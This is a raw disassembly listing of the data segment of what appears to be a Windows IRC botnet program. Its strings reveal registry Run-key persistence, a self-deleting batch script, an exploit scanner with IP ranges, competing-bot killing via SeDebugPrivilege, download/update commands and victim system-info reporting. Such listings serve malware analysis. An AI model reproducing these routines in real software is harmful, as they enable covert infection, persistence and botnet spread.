aSS_3 db '%s\%s',0 ; DATA XREF: sub_417119+BA�o
align 10h
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_417119+F9�o
align 10h
aSoftwareMicr_0 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_417119+14D�o
align 10h
aBadAllocatio_9 db 'bad allocation',0 ; DATA XREF: seg002:00424A44�o
align 10h
aIrn db '--irn ',0 ; DATA XREF: seg000:0041BC44�o
align 4
aSS_5 db '%s\%s',0 ; DATA XREF: seg000:0041BCF1�o
align 10h
aSSS_0 db '%s %s%s',0 ; DATA XREF: seg000:0041BDBF�o
aS_11 db '%s',0 ; DATA XREF: seg000:0041BE51�o
align 4
aRm db 'RM',0 ; DATA XREF: seg000:0041BF25�o
align 10h
aBk db 'BK',0 ; DATA XREF: seg000:0041BF5E�o
align 4
aUnm db 'UNM',0 ; DATA XREF: seg000:0041BF83�o
aBadAllocati_10 db 'bad allocation',0 ; DATA XREF: seg002:00425224�o
align 4
aSS_6 db '%s %s',0Dh,0Ah,0 ; DATA XREF: sub_41829C+42�o
aSS_7 db '%s %s',0Dh,0Ah,0 ; DATA XREF: sub_41802F+159�o
aSS_8 db '%s-%s',0 ; DATA XREF: sub_41802F+1D6�o
align 10h
aSSSS00S db '%s %s',0Dh,0Ah ; DATA XREF: sub_41802F+24D�o
db '%s %s 0 0 :%s',0Dh,0Ah,0
align 4
asc_420238 db 0Dh,0Ah,0 ; DATA XREF: sub_417F01+7E�o
align 4
aS_10 db '%s',0 ; DATA XREF: sub_417F01+B6�o
align 10h
asc_420240 db 0Dh,0Ah,0 ; DATA XREF: sub_417F01+CB�o
align 4
aSSS_1 db '%s %s %s',0Dh,0Ah,0 ; DATA XREF: sub_417361+C2�o
align 10h
aS_12 db '%s',0 ; DATA XREF: sub_41783D+4A�o
align 4
asc_420254 db ' :',0 ; DATA XREF: sub_41783D+7E�o
align 4
aS_13 db '%s',0 ; DATA XREF: sub_41783D+8A�o
align 4
asc_42025C: ; DATA XREF: sub_41783D+E1�o
unicode 0, < >,0
aS_14 db '%s',0 ; DATA XREF: sub_41783D+FA�o
align 4
asc_420264: ; DATA XREF: sub_41783D+124�o
unicode 0, < >,0
aSS_9 db '%s %s',0Dh,0Ah,0 ; DATA XREF: sub_41783D+24A�o
aSSS_2 db '%s %s %s',0Dh,0Ah,0 ; DATA XREF: sub_41783D+31E�o
align 4
a001 db '001',0 ; DATA XREF: sub_41783D+33A�o
aSSSSSS db '%s %s %s',0Dh,0Ah ; DATA XREF: sub_41783D+3D3�o
db '%s %s %s',0Dh,0Ah,0
align 4
a332 db '332',0 ; DATA XREF: sub_41783D+417�o
asc_42029C db ' :',0 ; DATA XREF: sub_41783D+499�o
align 10h
aS_0 db '%s',0 ; DATA XREF: sub_41783D+4A5�o
align 4
asc_4202A4: ; DATA XREF: sub_41783D+4D9�o
unicode 0, <!>,0
aS_1 db '%s',0 ; DATA XREF: sub_41783D+4E5�o
align 4
a332_0 db '332',0 ; DATA XREF: sub_41783D+52D�o
aS_2 db '%s',0 ; DATA XREF: sub_41783D+546�o
align 4
aS_3 db '%s',0 ; DATA XREF: sub_41783D+5B1�o
align 4
aS_4 db '%s',0 ; DATA XREF: sub_41783D+5DF�o
align 4
asc_4202BC: ; DATA XREF: sub_41783D+64E�o
unicode 0, <;>,0
asc_4202C0: ; DATA XREF: sub_41783D:loc_417E92�o
unicode 0, <;>,0
asc_4202C4: ; DATA XREF: sub_41783D:loc_417E9F�o
unicode 0, <;>,0
asc_4202C8: ; DATA XREF: sub_417676+C�o
unicode 0, < >,0
aS_8 db '-s',0 ; DATA XREF: sub_417676+27�o
align 10h
aS_9 db '/s',0 ; DATA XREF: sub_417676+3F�o
align 4
asc_4202D4: ; DATA XREF: sub_417676:loc_4176CA�o
unicode 0, < >,0
aQwertyuiopasdf db 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPLKJHGFDSAZXCVBNM',0
; DATA XREF: sub_41748B+21�o
align 10h
asc_420310: ; DATA XREF: sub_41748B+5E�o
unicode 0, <[>,0
aSS db '%s%s|',0 ; DATA XREF: sub_41748B+95�o
align 4
aSS_0 db '%s%s|',0 ; DATA XREF: sub_41748B+C5�o
align 4
aSp db '%sP|',0 ; DATA XREF: sub_41748B+F0�o
align 4
aS0I64u db '%s0%I64u|',0 ; DATA XREF: sub_41748B+12F�o
align 4
aSI64u db '%s%I64u|',0 ; DATA XREF: sub_41748B+150�o
align 4
aSC db '%s%c',0 ; DATA XREF: sub_41748B+18F�o
align 4
aS db '%s]',0 ; DATA XREF: sub_41748B+1BA�o
aBadAllocati_11 db 'bad allocation',0
align 10h
aHs db 'HS',0 ; DATA XREF: sub_418D17+28�o
align 4
asc_420364: ; DATA XREF: sub_418C40+89�o
unicode 0, < >,0
aSS_10 db '%s\%s',0 ; DATA XREF: sub_418B1F+4E�o
align 10h
aGet db 'GET',0 ; DATA XREF: sub_418552+B7�o
aQue?_1 db 'Que?',0 ; DATA XREF: sub_418552+C7�o
align 10h
aHttp1_1501NotI db 'HTTP/1.1 501 Not Implemented',0Dh,0Ah ; DATA XREF: sub_418552+10F�o
db 'Content-Length: %d',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
aSSSS db '%s\%s\%s%s',0 ; DATA XREF: sub_418552+229�o
align 4
aSSS db '%s\%s\%s',0 ; DATA XREF: sub_418552+1F2�o
align 10h
aSS_4 db '%s\%s',0 ; DATA XREF: sub_418552+25A�o
align 4
aQue? db 'Que?',0 ; DATA XREF: sub_418552+3A8�o
align 10h
aQue?_0 db 'Que?',0 ; DATA XREF: sub_418552+2BE�o
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 ok',0Dh,0Ah ; DATA XREF: sub_418552+3FC�o
db 'Content-Length: %d',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHttpTransferD_ db 'HTTP: Transfer: %d.%d.%d.%d (N/A). %d Total Sends.',0
; DATA XREF: sub_418552+51D�o
align 4
aHttpTransfer_0 db 'HTTP: Transfer: %d.%d.%d.%d (%s). %d Total Sends.',0
; DATA XREF: sub_418552+54A�o
align 4
asc_42049C db 0Dh,0Ah,0 ; DATA XREF: sub_4184BF+11�o
align 10h
asc_4204A0: ; DATA XREF: sub_4184BF:loc_4184EB�o
unicode 0, < >,0
asc_4204A4: ; DATA XREF: sub_4184BF+3D�o
unicode 0, < >,0
asc_4204A8: ; DATA XREF: sub_4184BF+54�o
unicode 0, < >,0
asc_4204AC db 0Dh,0Ah ; DATA XREF: sub_4184BF+78�o
db 0Dh,0Ah,0
align 4
asc_4204B4 db '%x',0 ; DATA XREF: sub_418396+CA�o
align 4
aBadAllocati_12 db 'bad allocation',0
align 4
aS_15 db '%s',0 ; DATA XREF: sub_41B7F9+74�o
align 4
aSX db '%s%X',0 ; DATA XREF: sub_41B7F9+EC�o
align 4
aBadAllocati_13 db 'bad allocation',0
align 4
a@echoOff1DelSI db '@echo off',0Dh,0Ah ; DATA XREF: sub_4190BD+7E�o
db ':1',0Dh,0Ah
db 'del "%s"',0Dh,0Ah
db 'if exist "%s" goto 1',0Dh,0Ah
db 'del "%%0"',0Dh,0Ah,0
align 10h
aSTmpIIICCC_bat db '%s\tmp-%i%i%i-%c%c%c.bat',0 ; DATA XREF: sub_4190BD+FC�o
align 4
aW: ; DATA XREF: sub_4190BD+110�o
unicode 0, <w>,0
aS_6 db '%s',0 ; DATA XREF: sub_4190BD+12B�o
align 4
aRegistryMonito db 'Registry Monitor',0 ; DATA XREF: sub_419477+D9�o
align 4
aSoftwareMicr_1 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_419477+12A�o
align 4
aQuitSYouKill_0 db 'QUIT :%s YOU KILLED ME :<',0Dh,0Ah,0
aQuitSYouKilled db 'QUIT :%s YOU KILLED ME :< --UPDATED',0Dh,0Ah,0
; DATA XREF: sub_419477+15A�o
align 4
aRemoveAuthenti db 'Remove: Authentication Failed.',0
align 4
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_418FC6+4E�o
aVis db 'VIS',0 ; DATA XREF: sub_418E51+42�o
a2k3 db '2K3',0 ; DATA XREF: sub_418E51+55�o
aXp_0 db 'XP',0 ; DATA XREF: sub_418E51+62�o
align 4
a2k db '2K',0 ; DATA XREF: sub_418E51+6E�o
align 4
aMe db 'ME',0 ; DATA XREF: sub_418E51+81�o
align 4
a98 db '98',0 ; DATA XREF: sub_418E51+8E�o
align 10h
aNt db 'NT',0 ; DATA XREF: sub_418E51+A0�o
align 4
a95 db '95',0 ; DATA XREF: sub_418E51+AD�o
align 4
aUnk db 'UNK',0 ; DATA XREF: sub_418E51:loc_418F05�o
aOsMicrosoftWin db '[OS: Microsoft Windows %s %s (%i.%i build %i)]',0
; DATA XREF: sub_418E51+108�o
align 4
aS_5 db '%s',0 ; DATA XREF: sub_418E51+13A�o
align 10h
a192_168__ db '192.168.*.*',0 ; DATA XREF: sub_419347+32�o
a10___ db '10.*.*.*',0 ; DATA XREF: sub_419347+46�o
align 4
a111___ db '111.*.*.*',0 ; DATA XREF: sub_419347+5A�o
align 4
a15___ db '15.*.*.*',0 ; DATA XREF: sub_419347+6E�o
align 10h
a16___ db '16.*.*.*',0 ; DATA XREF: sub_419347+82�o
align 4
a101___ db '101.*.*.*',0 ; DATA XREF: sub_419347+96�o
align 4
a110___ db '110.*.*.*',0 ; DATA XREF: sub_419347+A6�o
align 4
a112___ db '112.*.*.*',0 ; DATA XREF: sub_419347+B6�o
align 10h
a170_65__ db '170.65.*.*',0 ; DATA XREF: sub_419347+C6�o
align 4
a172_D__ db '172.%d.*.*',0 ; DATA XREF: sub_419347+E0�o
align 4
aBadAllocati_14 db 'bad allocation',0
align 4
aBadAllocati_15 db 'bad allocation',0
align 4
aMessageboxa_0 db 'MessageBoxA',0 ; DATA XREF: sub_419677+12�o
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_419677+17�o
align 10h
dword_420700 dd 0D010Fh, 0C3000000h, 0 ; DATA XREF: sub_4195EC+19�o
dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh, 20646162h, 6F6C6C61h
dd 69746163h, 6E6Fh
dword_42072C dd 63257325h, 0 ; DATA XREF: sub_4196D1+55�o
dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh
dword_420744 dd 6C6E6977h, 6E6F676Fh, 6578652Eh, 0 ; DATA XREF: sub_419EA0+3C�o
dword_420754 dd 68637673h, 2E74736Fh, 657865h ; DATA XREF: sub_419EA0+44�o
dword_420760 dd 76726573h, 73656369h, 6578652Eh, 0 ; DATA XREF: sub_419EA0+4C�o
aOpenthread db 'OpenThread',0 ; DATA XREF: sub_419EA0+5F�o
align 4
aKernel32_dll_0 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+64�o
align 4
aOpenprocess db 'OpenProcess',0 ; DATA XREF: sub_419EA0+78�o
aKernel32_dll_1 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+7D�o
align 4
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_419EA0+8C�o
align 4
aKernel32_dll_2 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+91�o
align 4
aProcess32first db 'Process32First',0 ; DATA XREF: sub_419EA0+A0�o
align 4
aKernel32_dll_3 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+A5�o
align 4
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_419EA0+B4�o
align 4
aKernel32_dll_4 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+B9�o
align 4
aModule32first db 'Module32First',0 ; DATA XREF: sub_419EA0+C8�o
align 4
aKernel32_dll_5 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+CD�o
align 4
aModule32next db 'Module32Next',0 ; DATA XREF: sub_419EA0+DC�o
align 4
aKernel32_dll_6 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+E1�o
align 4
aThread32first db 'Thread32First',0 ; DATA XREF: sub_419EA0+F0�o
align 4
aKernel32_dll_7 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+F5�o
align 4
aThread32next db 'Thread32Next',0 ; DATA XREF: sub_419EA0+104�o
align 4
aKernel32_dll_8 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+109�o
align 4
aReadprocessmem db 'ReadProcessMemory',0 ; DATA XREF: sub_419EA0+118�o
align 4
aKernel32_dll_9 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+11D�o
align 4
aGetmodulefilen db 'GetModuleFileNameExA',0 ; DATA XREF: sub_419EA0+12C�o
align 10h
aPsapi_dll db 'psapi.dll',0 ; DATA XREF: sub_419EA0+131�o
align 4
aSS_2 db '%s\%s',0 ; DATA XREF: sub_419EA0+1F5�o
align 4
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_419EA0+2BE�o
align 4
aSedebugprivi_0 db 'SeDebugPrivilege',0 ; DATA XREF: sub_419EA0+365�o
align 4
aSystem db 'System',0 ; DATA XREF: sub_419EA0+390�o
align 4
aBotKilledS db 'Bot Killed: %s',0 ; DATA XREF: sub_419EA0+451�o
align 4
aSoftwareMicr_2 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_419A9F+36�o
align 4
aSoftwareMicr_3 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',0
; DATA XREF: sub_419A9F+3D�o
align 4
aSoftwareMicr_4 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx',0
; DATA XREF: sub_419A9F+44�o
aSoftwareMicr_5 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices',0
; DATA XREF: sub_419A9F+4B�o
align 4
aSystemControls db 'SYSTEM\ControlSet001\Services\Eventlog\System',0
; DATA XREF: sub_419C6D+26�o
align 4
aSS_1 db '%s\%s',0 ; DATA XREF: sub_419C6D+E4�o
align 4
aLdm db 'LDM',0 ; DATA XREF: sub_419C6D+118�o
aNetdde db 'NetDDE',0 ; DATA XREF: sub_419C6D+12B�o
align 4
aEventmessagefi db 'EventMessageFile',0 ; DATA XREF: sub_419C6D+142�o
align 4
aBadAllocati_16 db 'bad allocation',0
align 4
aListTTooLong db 'list<T> too long',0
align 10h
dd offset dword_420E80
off_420A74 dd offset nullsub_1 ; DATA XREF: sub_41BB84+23�o
dd 7325h, 652Dh, 31h, 4C44h
aDlAuthFailure_ db 'DL: Auth Failure.',0
align 4
aDlInvalidArgum db 'DL: Invalid Arguments',0
align 4
aUpdAuthFailure db 'UPD: Auth Failure.',0
align 4
aUpdInvalidArgu db 'UPD: Invalid Arguments.',0
dd offset dword_421030
off_420AE4 dd offset sub_40177B ; DATA XREF: seg000:0041C3BA�o
dd offset dword_420FE4
off_420AEC dd offset sub_4019F3 ; DATA XREF: seg000:0041C3D6�o
aHttpSDS_3 db 'http://%s:%d/%s',0
dd offset dword_42107C
off_420B04 dd offset sub_401C1D ; DATA XREF: seg000:0041C3F2�o
aSystemSCpuIXS@ db 'System: %s [CPU: %i x %s @ %dMhz] [RAM: %iMB/%iMB] [Country: %s] '
db '[IP: %s] [User: %s] [System Dir: %s] [Uptime: %I64ud %I64uh %I64u'
db 'm]',0
align 10h
aNetIpSHostNA db 'Net: IP: %s Host: N/A',0
align 4
aNetIpSHostS db 'Net: IP: %s Host: %s',0
align 10h
dd offset dword_421114
off_420BC4 dd offset sub_401CC0 ; DATA XREF: seg000:0041C40E�o
dd offset dword_4210C8
off_420BCC dd offset sub_401E82 ; DATA XREF: seg000:0041C42A�o
aScanUnknownExp db 'Scan: Unknown Exploit.',0
align 4
a____0 db '*.*.*.*',0
aA db '-a',0
align 4
aB db '-b',0
align 4
aC db '-c',0
align 4
aScanNotEnoughT db 'Scan: Not Enough Threads. %d Available.',0
aD_D_D_D_0 db '%d.%d.%d.%d',0
aX_ db 'x.',0
align 4
aD_ db '%d.',0
aSx_ db '%sx.',0
align 10h
aSD_ db '%s%d.',0
align 4
aSx db '%sx',0
aSD db '%s%d',0
align 4
aD_x_x_x db '%d.x.x.x',0
align 10h
aD_D_x_x db '%d.%d.x.x',0
align 4
aD_D_D_x db '%d.%d.%d.x',0
align 4
aScanSDUsingDTh db 'Scan: %s:%d Using %d Threads.',0
align 4
aScanner db 'Scanner',0
aScanAllScanThr db 'Scan: All Scan Threads Stopped. %d killed.',0
align 4
aStatisticsExpl db 'Statistics: Exploits:',0
align 4
aSSD db '%s %s: %d',0
align 10h
aSDaemons db '%s; Daemons:',0
align 10h
aSTftpD db '%s TFTP: %d',0
aSHttpD db '%s HTTP: %d',0
dd offset dword_4211F8
off_420D1C dd offset sub_401F1C ; DATA XREF: seg000:0041C454�o
dd offset dword_4211AC
off_420D24 dd offset sub_40243A ; DATA XREF: seg000:0041C470�o
dd offset dword_421160
off_420D2C dd offset sub_40251A ; DATA XREF: seg000:0041C48C�o
dbl_420D30 dq 5.0e-1 ; DATA XREF: sub_41A9DE:loc_41AF68�r
flt_420D38 dd 4.2949673e9 ; DATA XREF: sub_41A9DE+584�r
align 10h
dd 48h, 0Eh dup(0)
dd offset dword_423064
dd offset dword_421250
dd 10h
dword_420D88 dd 3 dup(0) ; DATA XREF: seg001:0041D334�o
dd offset off_423008
dd offset dword_420D9C
dword_420D9C dd 2 dup(0) ; DATA XREF: seg001:00420D98�o
dd 3, 420DACh, 420DBCh, 420F48h, 420F94h, 0
dd offset off_423008
dd 2, 0
dd 0FFFFFFFFh, 0
dd 40h, 420D9Ch
dword_420DD8 dd 3 dup(0) ; DATA XREF: seg001:0041D368�o
dd offset off_425958
dd offset dword_420FB0
dword_420DEC dd 3 dup(0) ; DATA XREF: seg001:0041D388�o
dd offset off_423030
dd offset dword_420E00
dword_420E00 dd 2 dup(0) ; DATA XREF: seg001:00420DFC�o
dd 1, 420E10h, 420E18h, 0
dd offset off_423030
dd 2 dup(0)
dd 0FFFFFFFFh, 0
dd 40h, 420E00h
dword_420E34 dd 3 dup(0) ; DATA XREF: seg001:0041DC20�o
dd offset off_423E50
dd offset dword_420E48
dword_420E48 dd 2 dup(0) ; DATA XREF: seg001:00420E44�o
dd 2, 420E58h, 420E64h, 420F94h, 0
dd offset off_423E50
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 420E48h
dword_420E80 dd 3 dup(0) ; DATA XREF: seg001:00420A70�o
dd offset off_425900
dd offset dword_420E94
dword_420E94 dd 2 dup(0) ; DATA XREF: seg001:00420E90�o
dd 1, 420EA4h, 420EACh, 0
dd offset off_425900
dd 2 dup(0)
dd 0FFFFFFFFh, 0
dd 40h, 420E94h
dword_420EC8 dd 3 dup(0) ; DATA XREF: seg001:0041D328�o
dd offset off_425918
dd offset dword_420EDC
dword_420EDC dd 2 dup(0) ; DATA XREF: seg001:00420ED8�o
dd 3, 420EECh, 420EFCh, 420F48h, 420F94h, 0
dd offset off_425918
dd 2, 0
dd 0FFFFFFFFh, 0
dd 40h, 420EDCh
dword_420F18 dd 3 dup(0) ; DATA XREF: seg001:0041D31C�o
dd offset off_425938
dd offset dword_420F2C
dword_420F2C dd 2 dup(0) ; DATA XREF: seg001:00420F28�o
dd 2, 420F3Ch, 420F48h, 420F94h, 0
dd offset off_425938
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 420F2Ch, 3 dup(0)
dd offset off_425974
dd offset dword_420F78
dword_420F78 dd 2 dup(0) ; DATA XREF: seg001:00420F74�o
dd 2, 420F88h, 420FC8h, 420F94h, 0
dd offset off_425958
align 10h
dd 0FFFFFFFFh, 0
dd 40h, 420FB0h
dword_420FB0 dd 2 dup(0) ; DATA XREF: seg001:00420DE8�o
dd 1, 420FC0h, 420F94h, 0
dd offset off_425974
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 420F78h
dword_420FE4 dd 3 dup(0) ; DATA XREF: seg001:00420AE8�o
dd offset off_425990
dd offset dword_420FF8
dword_420FF8 dd 2 dup(0) ; DATA XREF: seg001:00420FF4�o
dd 2, 421008h, 421014h, 420EACh, 0
dd offset off_425990
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 420FF8h
dword_421030 dd 3 dup(0) ; DATA XREF: seg001:00420AE0�o
dd offset off_4259A8
dd offset dword_421044
dword_421044 dd 2 dup(0) ; DATA XREF: seg001:00421040�o
dd 2, 421054h, 421060h, 420EACh, 0
dd offset off_4259A8
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 421044h
dword_42107C dd 3 dup(0) ; DATA XREF: seg001:00420B00�o
dd offset off_4259BC
dd offset dword_421090
dword_421090 dd 2 dup(0) ; DATA XREF: seg001:0042108C�o
dd 2, 4210A0h, 4210ACh, 420EACh, 0
dd offset off_4259BC
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 421090h
dword_4210C8 dd 3 dup(0) ; DATA XREF: seg001:00420BC8�o
dd offset off_4259D8
dd offset dword_4210DC
dword_4210DC dd 2 dup(0) ; DATA XREF: seg001:004210D8�o
dd 2, 4210ECh, 4210F8h, 420EACh, 0
dd offset off_4259D8
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 4210DCh
dword_421114 dd 3 dup(0) ; DATA XREF: seg001:00420BC0�o
dd offset off_4259F4
dd offset dword_421128
dword_421128 dd 2 dup(0) ; DATA XREF: seg001:00421124�o
dd 2, 421138h, 421144h, 420EACh, 0
dd offset off_4259F4
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 421128h
dword_421160 dd 3 dup(0) ; DATA XREF: seg001:00420D28�o
dd offset off_425A10
dd offset dword_421174
dword_421174 dd 2 dup(0) ; DATA XREF: seg001:00421170�o
dd 2, 421184h, 421190h, 420EACh, 0
dd offset off_425A10
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 421174h
dword_4211AC dd 3 dup(0) ; DATA XREF: seg001:00420D20�o
dd offset off_425A2C
dd offset dword_4211C0
dword_4211C0 dd 2 dup(0) ; DATA XREF: seg001:004211BC�o
dd 2, 4211D0h, 4211DCh, 420EACh, 0
dd offset off_425A2C
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 4211C0h
dword_4211F8 dd 3 dup(0) ; DATA XREF: seg001:00420D18�o
dd offset off_425A48
dd offset dword_42120C
dword_42120C dd 2 dup(0) ; DATA XREF: seg001:00421208�o
dd 2, 42121Ch, 421228h, 420EACh, 0
dd offset off_425A48
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 42120Ch, 3 dup(0)
dword_421250 dd 42C4h, 43C9h, 6640h, 8658h, 0EB68h, 1C1D3h, 1C1EEh
; DATA XREF: seg001:00420D80�o
dd 1C209h, 1C22Ch, 1C24Fh, 1C274h, 1C299h, 1C2BCh, 1C2E1h
dd 1C313h, 1C348h, 0
dword_421294 dd 2 dup(0) ; DATA XREF: sub_40B042+2�o
; sub_40B042+7�o
dword_42129C dd 2 dup(0) ; DATA XREF: sub_40B066+2�o
; sub_40B066+7�o
dd offset sub_40264D
dd 0
dd offset dword_4212DC
dd 0FFFFFFFFh, 41C1CBh
dword_4212B8 dd 19930522h, 1, 4212B0h, 5 dup(0) ; DATA XREF: seg000:0041C1E4�o
dd 1
dword_4212DC dd 3, 4212ECh, 421940h, 42195Ch, 0 ; DATA XREF: seg001:004212AC�o
dd offset off_423008
align 8
dd 0FFFFFFFFh, 0
dd 28h, 4026F8h, 0FFFFFFFEh, 0
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_402AD7
align 8
dd 0FFFFFFFEh, 0
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_402E1B
align 8
dd 0FFFFFFFEh, 0
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_4031EA
align 8
dd 0FFFFFFFEh, 0
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40334C
align 8
dd 0FFFFFFFEh, 0
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_403535
align 8
dd 0FFFFFFFEh, 0
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_403659
align 8
dd 0FFFFFFFEh, 0
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_4036D7
align 8
dd 0FFFFFFFEh, 0
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_403D75
align 8
dword_421408 dd 0FFFFFFFEh, 0 ; DATA XREF: seg000:00403F3A�o
dd 0FFFFFF80h, 0
dd 0FFFFFFFEh, 4040FFh, 404103h, 0FFFFFFFEh, 4040C5h, 4040D9h
dword_421430 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4049A0+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_404A38
align 10h
dword_421450 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_404C69+2�o
dd 0FFFFFFCCh, 0
dd 0FFFFFFFEh, 0
dd offset sub_404DCA
align 10h
dword_421470 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4050B1+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40511B
align 10h
dword_421490 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_405266+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_405311
align 10h
dword_4214B0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4053B5+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 0
dd offset sub_4054BE
dd 0FFFFFFFEh, 0
dd offset sub_4054CA
dword_4214D8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_405934+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_4059EE
align 8
dword_4214F8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_407A0B+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset loc_407AC1
align 8
dword_421518 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_407F55+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_407FBC
align 8
dword_421538 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4084A1+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_4085BB
align 8
dword_421558 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4087E0+2�o
dd 0FFFFFF8Ch, 0
dd 0FFFFFFFEh, 408A09h, 408A0Dh, 0
dword_421578 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_408AE1+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_408BA4
align 8
dword_421598 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_408C7E+2�o
dd 0FFFFFFCCh, 0
dd 0FFFFFFFEh, 0
dd offset sub_408D4F
dd 2 dup(0)
dd offset sub_408D1B
dword_4215C0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40A34F+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40A421
align 10h
dword_4215E0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40B29C+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40B35C
align 10h
dd offset loc_40B31E
dd offset loc_40B328
dword_421608 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40B3C2+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 40B405h, 40B40Eh, 40h, 2 dup(0)
dd offset sub_40B4E5
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 421624h
dword_421658 dd 19930522h, 2, 421634h, 1, 421644h, 3 dup(0) ; DATA XREF: seg000:0041C1FF�o
dd 1, 0
dword_421680 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40B4FD+2�o
dd 0FFFFFFB4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40B61D
align 10h
dd offset loc_40B58D
dd offset loc_40B596
dword_4216A8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40B699+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 40B804h, 40B808h, 0
dword_4216C8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40B818+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 40B89Dh, 40B8A1h
dword_4216E4 dd 0 ; DATA XREF: sub_40BA07+162�o
dd offset sub_40B1CF
align 10h
dd offset dword_4216F4
dword_4216F4 dd 2, 421700h, 42195Ch, 0 ; DATA XREF: seg001:004216F0�o
dd offset off_423E50
dd 0
dd 0FFFFFFFFh, 0
dd 0Ch, 40BD5Dh, 0
dword_421720 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40BE59+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 40BE79h, 40BE7Dh, 0
dword_421740 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40BEA5+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 40BEC9h, 40BECDh, 0
dword_421760 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40CB14+2�o
dd 0FFFFFFCCh, 0
dd 0FFFFFFFEh, 40CB9Ah, 40CBB1h, 0
dword_421780 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40CC52+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 40CC98h, 40CCACh, 0
